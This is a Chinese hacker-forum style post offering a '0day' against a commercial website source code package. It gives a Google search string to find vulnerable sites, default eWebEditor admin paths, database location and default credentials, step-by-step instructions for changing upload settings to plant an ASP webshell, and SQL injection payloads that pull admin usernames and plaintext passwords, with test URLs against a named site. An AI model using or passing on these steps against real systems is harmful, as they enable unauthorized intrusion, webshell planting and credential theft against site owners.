传信网络网站源码0day漏洞
此网站源码 超牛.防注入 上传很难突破.后台system/login.asp也是
进了ewebeditor也是防密码的
好多大牛都很难搞的下
此源码经过社工才搞到的.进了后台发现有个ewebeditor
所以了写个通杀漏洞
Google 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
数据库ubbcode/db/ewebeditor.mdb
默认账号密码yzm 111111
拿webshell方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:scriptkiddies 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
上传路径:/
图片限制:写上1000 免的上不了我们的asp木马
上传内容不要写
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
然后网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
上我们的ASP木马 回车 就可以等到路径
你懂的
PS:
以上是某大牛的原文,试了一下,这套源码并不像其所说的那么牛X,
其实这个系统是可以sql注入的,并且是明文。只不过字段不太统一,14-20左右。自己测试。
order by xx
如果有防注入,cookie注入可以突破
后台:system/login.asp
Exp:
1 | and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master |
测试:
1 | http: and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master//www.hack1990.com/product_show.asp?id=9 |
1 | http: union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master//www.hack1990.com/product_show.asp?id=245 |